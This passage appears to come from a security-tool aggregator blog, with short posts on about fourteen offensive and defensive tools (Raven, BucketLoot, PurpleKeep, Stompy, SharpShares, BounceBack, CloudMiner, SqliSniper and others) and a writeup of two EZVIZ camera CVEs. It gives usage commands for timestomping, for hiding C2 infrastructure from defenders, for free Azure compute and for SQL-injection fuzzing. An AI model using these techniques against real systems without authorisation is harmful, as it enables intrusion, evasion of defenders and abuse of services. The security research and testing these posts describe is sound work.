usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000


usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index f rom scratch, default: False
--debug Whether to print debug statements, default: False


usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
slack Send report to slack channel

-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)


Retrieve all workflows and actions associated with the organization.

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a Github token. For authenticated users, the next rate limiting applies:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour

Research Knowledge Base

Current Limitations

  • It is possible to run external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is trying to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case - a user can pass a pull request title (which is controllable parameter) to an action parameter that is named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for a code execution.
  • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R
29 January 2024 at 11:30

BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't needs to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response and if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.


Secret Scanning

Scans for over 80+ unique RegEx signatures that can help in uncovering secret exposures tagged with their severity from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a 80+ unique regEx signatures list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.


The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.

PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R
30 January 2024 at 11:30

With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines


You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.



Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot


Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.


Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations


  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR


Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R
31 January 2024 at 11:30

A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.


  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  1. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse 
  1. Use specific credentials:

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R
1 February 2024 at 11:30

Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.

SAP Router

SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan find out if it is activated:

sncscan -H -S 3299 -p router


The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan and impact the connections security is in the section Background

sncscan -H -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/,/H/ 

Through SAP Router

sncscan --route-string /H/ -p diag


Requirements: Currently the sncscan only works with the pysap libary from our fork.

python3 -m pip install -r requirements.txt


python3 setup.py test
python3 setup.py install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: Minimum security level required for SNC connections.
  • snc/data_protection/max: highest security level, initiated by the SAP system
  • snc/data_protection/use: default security level, initiated from the SAP system

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.

Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R
2 February 2024 at 11:30

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances

Attackers are abusing MySQL instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destruct data, and extort money via ransom. For example one of the significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments

Tool Usage

Researched and Developed By Aditya K Sood and Rohit BansalΒ 

Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R
3 February 2024 at 11:30

Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.

Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name Publication Date Link
Hacking With Your Nemesis Aug 9, 2023 https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows Aug 2, 2023 https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data Jul 26, 2023 https://posts.specterops.io/on-structured-data-707b7d9876c6


Nemesis is built on large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we're forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.

Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R
4 February 2024 at 11:30

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - secureci.org for more information.


  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.


This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]


  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.


To use this script to interact with a GitHub repo, you might run a command like the following:

python argus.py --mode repo --url https://github.com/username/repo.git --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker.io docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.


If there is an issue with needing the Github authorization for running, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all the requests made to Github. Note, we do not store this information anywhere, neither create any thing in the Github account - we only use this for cloning the repositories.


Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
author={S. Muralee, I. Koishybayev, A. Nahapetyan, G. Tystahl, B. Reaves, A. Bianchi, W. Enck,
A. Kapravelos, A. Machiry},
booktitle={32st USENIX Security Symposium (USENIX Security 23)},

Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R
5 February 2024 at 11:30

navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:


navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.


navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.


git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build


SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R
6 February 2024 at 11:30

Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain

Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not ran on a domain-joined host)
/domain - specify domain name (if not ran on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
:all - All enabled computers with 'primary' group 'Domain Computers'
:dc - All enabled Domain Controllers (not read-only DCs)
:exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
:servers - All enabled servers
:servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from
ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration
/outfile - specify file for shares to be appended to instead of printing to std out
/verbose - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or seprately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.

BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R
7 February 2024 at 11:30

BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit project's wiki.


  • Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.
  • Easily extendable project structure, everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.
  • Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.
  • Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
  • Support for multiple proxies with different filter pipelines at one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.


BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added, just register your RuleBaseCreator or RuleWrapperCreator. See already created RuleBaseCreators and RuleWrapperCreators

Rules configuration page may be found here.


At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added, just register your new type in manager. Example proxy realizations may be found here.

Proxies configuration page may be found here.


Just download latest release from release page, unzip it, edit config file and go on.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot

SADProtocol goes to Hollywood

By: Zion3R
8 February 2024 at 11:30

Faraday’s researchers Javier Aguinaga and Octavio Gianatiempo have investigated on IP cameras and two high severity vulnerabilities.

This research project began when Aguinaga's wife, a former Research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, opted for a more unconventional approach to tackle the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.

They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:

Product Model Affected Versions
CS-C6N-B0-1G2WF Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR Versions below V5.2.3 build 230217
EZVIZ LC1C Versions below V5.3.4 build 230214

These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:

Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational. A deep detailed dive into the whole research process, can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, developing an exploit capable of bypassing ASLR. Plus, all the details about the Hollywood-style post-exploitation, including tracing, in memory code patching and manipulating the execution of the binary that implements most of the camera features.

This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.

CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R
9 February 2024 at 11:30

Execute code within Azure Automation service without getting charged


CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.

  • Each execution is limited to 3 hours


  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool


pip install .


usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode

Example usage




CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian

SqliSniper - Advanced Time-based Blind SQL Injection Fuzzer For HTTP Headers

By: Zion3R
10 February 2024 at 11:30

SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.

Key Features

  • Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
  • Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
  • Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
  • False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
  • Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.


git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt


This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
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β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–„β–„ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
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-: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]

Detect SQL injection by sending malicious queries

-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g.,
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
